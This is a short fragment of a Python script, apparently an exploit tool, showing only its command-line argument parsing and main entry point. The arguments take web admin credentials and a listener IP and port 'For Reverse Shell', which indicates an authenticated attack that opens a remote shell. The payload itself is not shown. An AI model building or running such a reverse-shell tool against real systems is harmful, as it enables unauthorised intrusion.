parser.add_argument("-u", "--username", type=str, help="Username For Web Admin", required=False)<br /> parser.add_argument("-p", "--password", type=str, help="Password For Web Admin", required=False)<br /> parser.add_argument("-L", "--lhost", type=str, help="Listener IP Adress For Reverse Shell", required=False)<br /> parser.add_argument("-P", "--lport", type=str, help="Listener Port For Reverse Shell", required=False)<br /><br /> args = parser.parse_args()<br /><br /> if args.ip and args.username and args.password and args.lhost and args.lport:<br /> print(font)<br /> login(args.ip, args.username, args.password, args.lhost , args.lport)<br /> else:<br /> print(font)<br /> parser.print_help()<br /><br />if __name__ == "__main__":<br /> main()<br /><br /><br /></code></pre>